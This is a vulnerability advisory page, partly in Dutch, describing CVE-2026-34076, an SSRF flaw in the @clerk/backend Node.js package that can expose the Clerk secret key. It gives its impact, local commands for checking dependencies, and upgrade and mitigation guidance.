Platform
nodejs
Component
@clerk/backend
Opgelost in
0.1.1
2.0.1
3.0.1
3.1.1
3.2.3
CVE-2026-34076 describes a Server-Side Request Forgery (SSRF) vulnerability found in the @clerk/backend Node.js package. This flaw allows an unauthenticated attacker to potentially extract the application's Clerk-Secret-Key by crafting malicious request paths. The vulnerability affects applications that have explicitly enabled the frontendApiProxy feature, which is not enabled by default; users of @clerk/nextjs are not affected. A fix is available in version 3.2.3.
The primary impact of CVE-2026-34076 is the potential exposure of the Clerk-Secret-Key. This key is crucial for authentication and authorization within Clerk applications. If an attacker obtains this key, they could impersonate legitimate users, access sensitive data, and potentially compromise the entire application. The attack vector involves crafting a specific request path that tricks the clerkFrontendApiProxy function into sending the secret key to a server controlled by the attacker. This is a significant risk, particularly for applications handling sensitive user data or financial transactions.
This vulnerability was publicly disclosed on March 27, 2026. There is no indication of active exploitation at this time, and it is not currently listed on the CISA KEV catalog. Public proof-of-concept (PoC) code is not widely available, but the vulnerability's nature makes it relatively straightforward to exploit once the application is identified as using the vulnerable version of @clerk/backend with the frontendApiProxy feature enabled.
Applications built with @clerk/backend that have explicitly enabled the frontendApiProxy feature are at risk. This includes applications utilizing Clerk's authentication and authorization services and relying on the Clerk-Secret-Key for secure operation. Developers who have not recently reviewed their dependencies or are using older versions of @clerk/backend are particularly vulnerable.
• nodejs / server:
npm list @clerk/backend• nodejs / server:
grep -r 'clerkFrontendApiProxy' ./src• nodejs / server:
find ./node_modules -name "@clerk/backend*" -print0 | xargs -0 npm lsdisclosure
Exploit Status
EPSS
0.04% (14% percentiel)
CISA SSVC
CVSS-vector
The recommended mitigation for CVE-2026-34076 is to upgrade to @clerk/backend version 3.2.3 or later. This version includes a fix that prevents the SSRF vulnerability. If upgrading is not immediately feasible, consider disabling the frontendApiProxy feature within your application configuration. This will prevent the vulnerable functionality from being exposed. As a temporary workaround, implement strict input validation on request paths to prevent malicious path traversal attempts. After upgrading, confirm the fix by attempting to trigger the vulnerable endpoint with a crafted request and verifying that the Clerk-Secret-Key is not exposed.
Werk de pakketten @clerk/hono, @clerk/express, @clerk/backend en @clerk/fastify bij naar de versies 0.1.5, 2.0.7, 3.2.3 en 3.1.5 respectievelijk, of hoger. Dit corrigeert de SSRF-kwetsbaarheid die de Clerk-sleutel kan blootleggen.
Kwetsbaarheidsanalyses en kritieke waarschuwingen direct in uw inbox.
CVE-2026-34076 is a Server-Side Request Forgery (SSRF) vulnerability in the @clerk/backend Node.js package, allowing attackers to potentially extract the Clerk-Secret-Key.
You are affected if you use @clerk/backend versions prior to 3.2.3 and have enabled the frontendApiProxy feature. Users of @clerk/nextjs are not affected.
Upgrade to @clerk/backend version 3.2.3 or disable the frontendApiProxy feature in your application configuration.
There is currently no indication of active exploitation of CVE-2026-34076.
Refer to the Clerk security advisory for detailed information and updates: [https://clerk.com/docs/security](https://clerk.com/docs/security)
Upload je dependency-bestand en kom direct te weten of deze en andere CVEs jou raken.